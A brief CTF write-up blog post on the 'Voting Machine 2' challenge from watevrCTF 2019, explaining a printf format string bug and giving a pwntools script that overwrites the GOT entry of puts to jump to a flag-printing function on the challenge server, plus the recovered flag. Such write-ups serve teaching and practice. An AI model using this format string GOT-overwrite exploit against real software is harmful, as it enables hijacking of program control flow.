Voting Machine 2 (watevrCTF 2019)

Bianry had a format string vulnerability as first argument of printf was controlled by user.

Idea to solve the challenge:

[*] Overwrite the GOT of puts with ‘0x08420736’ (method that prints flag). if you are not sure what is GOT and how it works i recommend you to read this writeup. The reason for choosing GOT of puts is becuase it is been invoked more than once before printf.

Here is the exploit for the challenge.

from pwn import *

get_got = 0x8422020

writes = {0x08422020:0x08420736}

payload = 'AA' payload += fmtstr_payload(8, writes, numbwritten=2)

p = remote("13.53.125.206", 50000) p.recvuntil("Topic: ") p.sendline(payload) p.interactive()

The flag is – watevr{GOT_som3_fl4g_for_you_https://www.youtube.com/watch?v=hYeFcSq7Mxg}

	Rakesh Paruchuri on Return to Libc In 64-bit
	sudhackar on Return to Libc In 64-bit
	Rakesh Paruchuri on 32c3 CTF PWN-200 (readme)
	sudhackar on 32c3 CTF PWN-200 (readme)

Paruchuri Rakesh

Cool…..

Voting Machine 2 (watevrCTF 2019)

Share this:

Related